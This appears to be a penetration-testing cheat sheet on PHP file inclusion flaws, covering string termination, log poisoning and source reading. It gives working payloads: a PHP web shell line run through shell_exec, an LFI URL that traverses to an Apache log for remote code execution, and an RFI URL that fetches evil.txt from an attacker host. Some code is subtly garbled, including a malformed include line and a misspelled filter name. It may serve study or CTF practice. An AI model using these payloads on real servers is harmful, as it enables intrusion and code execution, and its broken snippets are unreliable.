File inclusions (LFI, RFI)

A file inclusion vulnerability is a type of web vulnerability that is most commonly found to affect web applications that rely on a scripting run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time.

-- Wikipedia

• GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF

PHP settings

PHP Sicherheit: Local & Remote File Inclusion - Webmaster Tipps

• allow_url_include

• allow_url_fopen

String termination

Example:

include("path/ + $GET_['FILE] + ".php);

If we want to get rid of the enforced .php extension, we must terminate the string before. Following two ways may let you achieve exactly that.

1. Null byte poisoning

Terminate string with a null byte: %00 (PHP < 5.3.4).

filename.txt%00

2. Query parameter

Add a query parameter.

filename.txt?bla=

Above example then becomes path/filename.txt?bla=.php, the query parameter is ignored and the file is loaded as desired.

Local File Inclusion (LFI)

See also Directory traversal.

Log file poisoning

If requests are written to a log file and you are able to let a php script read and interpret those logs (LFI) you may even be able to gain remote code execution (RCE).

Example

Connect to the target.

nc -nv <ip> <port>

Write some php, that gets written into a log file.

<?php echo shell_exec($_GET['cmd']); ?>

Exploit an LFI to gain RCE.

http://website.com/addguestbook.php?name=a&comment=b&cmd=ipconfig&LANG=../../../../../../../xampp/apache/logs/access.log%00

Read source files

Use php filter and base64 encoding to bypass php execution and retrieve the source code.

php://filter/convert.base64encode/resource=<file>

Remote File Inclusion (RFI)

http://website.com/addguestbook.php?name=a&comment=b&LANG=http://10.11.0.5/evil.txt%00